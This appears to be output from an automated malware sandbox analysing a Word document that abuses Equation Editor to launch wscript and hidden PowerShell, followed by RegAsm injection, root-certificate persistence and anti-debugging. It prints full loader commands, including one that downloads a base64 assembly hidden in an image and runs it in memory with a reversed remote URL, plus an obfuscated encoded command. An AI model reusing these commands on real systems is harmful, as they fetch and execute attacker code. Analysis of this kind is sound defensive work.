                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://archive.org/download/new_image_vbs/new_image_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GFFREW/53/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002CF724 push 0000005Ch; retf 1_2_002CF72F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002E3C3A push esi; ret 1_2_002E3C3B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002D8F60 push eax; retf 1_2_002D8F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002E3C42 push esi; ret 1_2_002E3C43
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002E41EE push ebp; ret 1_2_002E41EF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002E41E6 push ebp; ret 1_2_002E41E7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002D01F4 push eax; retf 1_2_002D01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 1_2_002E15F5 pushfd ; ret 1_2_002E15FD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00252D88 pushad ; ret 7_2_00252D91
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00252D98 pushfd ; ret 7_2_00252DA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00457186 push ecx; ret 8_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_0045E55D push esi; ret 8_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_10002806 push ecx; ret 8_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0044693D push ecx; ret 11_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 11_2_00451D54 push eax; ret 11_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00451D34 push eax; ret 12_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 12_2_00444E71 push ecx; ret 12_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW,8_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040F7E2 Sleep,ExitProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041A7D9 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 599859
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1479
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 512
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3665
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 541
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 9437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3636 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3896 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3860 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924 | Thread sleep count: 512 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3924 | Thread sleep count: 3665 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976 | Thread sleep time: -2767011611056431s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976 | Thread sleep time: -599859s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3976 | Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020 | Thread sleep count: 541 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020 | Thread sleep time: -1623000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3104 | Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020 | Thread sleep count: 9437 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4020 | Thread sleep time: -28311000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3296 | Thread sleep time: -120000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2080 | Thread sleep time: -120000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00407877 FindFirstFileW,FindNextFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0044E8F9 FindFirstFileExA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_10006580 FindFirstFileExA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00418981 memset,GetSystemInfo
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00443355 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_00411D39 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434BD8 SetUnhandledExceptionFilter,8_2_00434BD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_100060E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_10002639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_10002B1C

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3800, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?XwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? 